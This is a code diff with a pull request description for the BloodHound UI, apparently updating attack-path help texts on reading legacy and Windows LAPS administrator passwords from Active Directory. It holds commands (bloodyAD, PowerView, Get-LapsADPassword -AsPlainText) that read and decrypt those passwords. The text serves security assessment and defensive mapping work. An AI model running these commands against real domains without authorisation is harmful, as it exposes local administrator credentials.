-                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
+                            {
+                                "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"
+                            }
                         </Typography>
                         <Typography variant='body2'>
                             See Windows abuse for retrieving and decrypting the encrypted attributes.

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx
@@ -100,16 +100,22 @@ const References: FC = () => {
                 https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
-            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+                https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
             </Link>
             <br />
             <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
-            https://github.com/CravateRouge/bloodyAD
+                https://github.com/CravateRouge/bloodyAD
             </Link>
         </Box>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx
@@ -99,6 +99,18 @@ const References: FC = () => {
                 href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'>
                 https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
             </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
+            https://github.com/CravateRouge/bloodyAD
+            </Link>
         </Box>
     );
 };

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
@@ -382,7 +382,8 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                             <br />
                         </Typography>
                         <Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties
+                            are relevant:
                             <br />
                             <b>- msLAPS-Password</b>: The plaintext LAPS password
                             <br />
@@ -392,27 +393,33 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                             <br />
                             <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
                             <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                            password
                             <br />
                             <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
+                            <br />
                         </Typography>
                         <Typography variant='body2'>
                             Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
                         </Typography>
                         <Typography component={'pre'}>
-                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
+                            {
+                                'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'
+                            }
                         </Typography>
                         <Typography variant='body2'>
                             Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
                         </Typography>
-                        <Typography component={'pre'}>
-                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
-                        </Typography>
+                        <Typography component={'pre'}>{'Get-LapsADPassword "WIN10" -AsPlainText'}</Typography>
                         <Typography variant='body2'>
-                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-                            lapsv2decrypt
-                        </Link>{' '} (dotnet or BOF).
+                            The encrypted attributes can also be retrieved and decrypted using{' '}
+                            <Link
+                                target='_blank'
+                                rel='noopener'
+                                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                                lapsv2decrypt
+                            </Link>{' '}
+                            (dotnet or BOF).
                         </Typography>
 
                         <Typography variant='body1'> Shadow Credentials attack </Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
@@ -357,10 +357,7 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                         </Typography>
                         <Typography variant='body2'>
                             The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500
-                            administrator) password of {targetName}. {sourceName} can do so by listing a computer
-                            object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of
-                            the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '}
-                            {targetName}.
+                            administrator) password of {targetName}.
                         </Typography>
 
                         <Typography variant='body2'>
@@ -373,6 +370,49 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                         <Typography variant='body2'>
                             Alternatively, GenericAll on a computer object can be used to perform a Resource-Based
                             Constrained Delegation attack.
+                        </Typography>
+
+                        <Typography variant='body1'> Retrieve LAPS Password </Typography>
+                        <Typography variant='body2'>
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                        </Typography>
+                        <Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
+                        <Typography variant='body2'>
+                            Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
+                        </Typography>
+                        <Typography component={'pre'}>
+                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
+                        </Typography>
+                        <Typography variant='body2'>
+                            Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
+                        </Typography>
+                        <Typography component={'pre'}>
+                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
+                        </Typography>
+                        <Typography variant='body2'>
+                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                            lapsv2decrypt
+                        </Link>{' '} (dotnet or BOF).
                         </Typography>
 
                         <Typography variant='body1'> Shadow Credentials attack </Typography>


### PR DESCRIPTION
<!-- README: https://github.com/SpecterOps/BloodHound/issues/672 -->
<!-- All pull requests require either an associated -->
<!-- Jira ticket or GitHub issue. PRs opened without -->
<!-- an associated discussion item will be closed! -->

## Description

- Cover Windows LAPS in read LAPS password abuse info
- Remove incorrect non-LAPS computer abuses for AllExtendedRights
- Remove incorrect read LAPS abuse for domain nodes

## Motivation and Context

This PR addresses: BED-5174 (https://github.com/SpecterOps/BloodHound/issues/1016) and BED-5175

The current abuse information around reading LAPS password contains incorrect information and its also missing information about Windows LAPS. This PR fixes that issue.

## How Has This Been Tested?

Tested with this dataset:
[20241001082802_BloodHound.zip](https://github.com/user-attachments/files/18149390/20241001082802_BloodHound.zip)

## Screenshots (optional):

![image](https://github.com/user-attachments/assets/e0e0bc31-754d-4927-9b4a-e525d740ac2e)

## Types of changes

<!-- Please remove any items that do not apply. -->

- Chore (a change that does not modify the application functionality)

## Checklist:

<!-- Please make sure you have completed all following checks. -->
- [x] I have met the contributing prerequisites
  - Assigned myself to this PR
  - Added the appropriate labels
  - Associated an issue: https://github.com/SpecterOps/BloodHound/issues/672
  - Read the Contributing guide: https://github.com/SpecterOps/BloodHound/wiki/Contributing
- [x] I have ensured that related documentation is up-to-date
  - Open API docs
  - Code comments (GoDocs / JSDocs)
- [x] I have followed proper test practices
  - Added/updated tests to cover my changes
  - All new and existing tests passed
